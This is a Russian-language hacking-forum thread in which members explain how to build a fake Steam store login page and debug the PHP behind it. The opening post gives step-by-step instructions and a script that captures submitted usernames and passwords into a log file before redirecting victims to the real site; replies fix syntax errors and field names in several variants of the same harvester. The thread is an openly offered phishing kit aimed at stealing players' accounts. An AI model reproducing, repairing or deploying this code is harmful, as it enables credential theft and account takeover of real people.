Вернуться   D3Scene.Ru Софт портал игр | Хаки | Проги | Статьи > Игровые платформы, клиенты > Steam Gaming и Hacking
Присоединяйся к нам

Steam Gaming и Hacking Steam хаки, способы читерства на официальных серверах.



Ответ
 
Опции темы Опции просмотра
Старый 16.12.2009, 20:03   #1
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор Сообщение

Fake store.steampowered.com/login/


Цитата:
Anastofius
Цитата:
Привет!
Помогите пожалуйста сделать фейк [Ссылки скрыты от гостей.]
Viglim23
Цитата:
ну, это cовсем несложно.
Для начала тебе надо выбрать хостинг с поддержкой php например holm.ru

идём дальше, смотрим сорс страницы логина --
PHP код:
<form name="logon" action="https://store.steampowered.com/login/" method="POST" onsubmit="doLogin(); return false;"
и заменяем action="https://store.steampowered.com/login/ на action="http://yourhost.ru/sniff.php"

затем делаеш сам скрипт
PHP код:
<?php
extract
($_REQUEST);
$out fopen("log.htm","a+t");
fwrite($out"$username : $password <br>\n");
fclose($out);
echo 
"<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=https://store.steampowered.com/login/'></head></html>";
?>
заливаешь подправленую страницу(переименовав в index.htm) и скрипт (sniff.php) в папку с документами на хост и ждеш гостей. результат работы сможешь посмотреть на [Ссылки скрыты от гостей.]
[HIDE="0"]Не пробывал, результат не известен.[/HIDE]
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Старый 08.02.2011, 17:07   #2
Новичок
 
Аватар для germaaaan
 
Регистрация: 08.02.2011
Сообщений: 1
Репутация: -2
По умолчанию

парни помогите мне, ничего не получается.
если что пишите в лс.. кому не лень научить нуба.
  Ответить с цитированием Наверх
Старый 09.02.2011, 02:42   #3
Новичок
 
Аватар для Camperokk
 
Регистрация: 13.01.2011
Сообщений: 4
Репутация: 0
По умолчанию

Parse error: parse error, unexpected $ in /home/s/мой сайт/WWW/login.php on line 11

скрипт
Цитата:
<?PHP
$Login = $_POST['lUsername'];
$Pass = $_POST['lPasswordLabel'];
$c = "$Login:$Pass";
$fp = fopen("base.txt","a+");
fwrite($fp,"\n $c \n");
fclose($fp);
header("Location: https://store.steampowered.com/");
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=https://store.steampowered.com/">"
?>
Я так понял что надо поставить скобки... Но где? если 11 строка - это закрывающая.
  Ответить с цитированием Наверх
Старый 09.02.2011, 12:25   #4
Именно тут нужен jQuery



 
Аватар для DeRZoST2
 
Регистрация: 09.12.2008
Адрес: Москва
Сообщений: 1,181
Репутация: 901
Отправить сообщение для DeRZoST2 с помощью ICQ Отправить сообщение для DeRZoST2 с помощью Skype™
По умолчанию

Цитата:
Сообщение от Camperokk Посмотреть сообщение
Parse error: parse error, unexpected $ in /home/s/мой сайт/WWW/login.php on line 11

скрипт


Я так понял что надо поставить скобки... Но где? если 11 строка - это закрывающая.
точку с запятой (;) на echo забыл...
__________________
[Ссылки скрыты от гостей.][Ссылки скрыты от гостей.]
  Ответить с цитированием Наверх
Пользователь сказал cпасибо:
Camperokk (09.02.2011)
Старый 09.02.2011, 16:51   #5
Новичок
 
Аватар для Camperokk
 
Регистрация: 13.01.2011
Сообщений: 4
Репутация: 0
По умолчанию

Цитата:
Сообщение от DeRZoST2 Посмотреть сообщение
точку с запятой (;) на echo забыл...
да нет,даже с ; ошибку выбивает...
Ошибка именно в скрипте где-то.Потому что на фейке гарены было также.
фейк сделал,а вот логинится не хочет...

Добавлено через 1 час 3 минуты
все) спасибо большое,просто надо было удалить строку с Echo и чуть изменить вот эти строки

$Login = $_POST['lUsername'];
$Pass = $_POST['lPasswordLabel'];

Последний раз редактировалось Camperokk; 09.02.2011 в 17:55. Причина: Добавлено сообщение
  Ответить с цитированием Наверх
Старый 10.02.2011, 01:15   #6
Именно тут нужен jQuery



 
Аватар для DeRZoST2
 
Регистрация: 09.12.2008
Адрес: Москва
Сообщений: 1,181
Репутация: 901
Отправить сообщение для DeRZoST2 с помощью ICQ Отправить сообщение для DeRZoST2 с помощью Skype™
По умолчанию

а ну я просто не заметил, вот только вопрос, какой придурок писал это?
Цитата:
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=https://store.steampowered.com/">"
для начала тут открывается двойными ковычками " тип стринг потом закрывается, в ненужном месте
в общем заменить то на это и всё норм
Цитата:
echo '<META HTTP-EQUIV="Refresh" content ="0; URL=https://store.steampowered.com/">';
-----
так же
Цитата:
<form name="logon" action="https://store.steampowered.com/login/" method="POST" onsubmit="doLogin(); return false;">
для того чтобы небыло лишних ошибок сделайте так
Цитата:
<form name="logon" action="https://store.steampowered.com/login/" method="POST">
так как onsubmit это процедура javascript, вряд ли кто то из вас знает как им пользоваться,
поэтому делайте зависимости только php и html
__________________
[Ссылки скрыты от гостей.][Ссылки скрыты от гостей.]
  Ответить с цитированием Наверх
Старый 03.04.2011, 20:15   #7
Новичок
 
Аватар для DPAKULA
 
Регистрация: 19.03.2009
Сообщений: 7
Репутация: -2
По умолчанию

Цитата:
<?
$Login = $_POST['username']; // Логин...
$Pass = $_POST['password']; // Пароль...
$log = fopen("log.htm","a+t"); //открываем файл хранилища...
fwrite($log,"\n $Login : $Pass \n"); //записываем всё в хранишище...
fclose($log); //закрываем хранилище
header("Location: https://store.steampowered.com/");
echo '<META HTTP-EQUIV="Refresh" content ="0; URL=https://store.steampowered.com/">';
?>
ребят, приходит только " : "
сам логин и пароль не пишет, что делать?
  Ответить с цитированием Наверх
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Перевод: zCarot | Дизайн: G-A | Верстка: OldEr
Текущее время: 10:07. Часовой пояс GMT +4.